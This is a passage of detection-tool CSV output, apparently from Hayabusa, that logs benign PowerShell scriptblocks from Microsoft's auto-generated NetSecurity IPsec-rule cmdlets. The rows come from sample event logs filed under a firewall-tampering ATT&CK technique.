[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 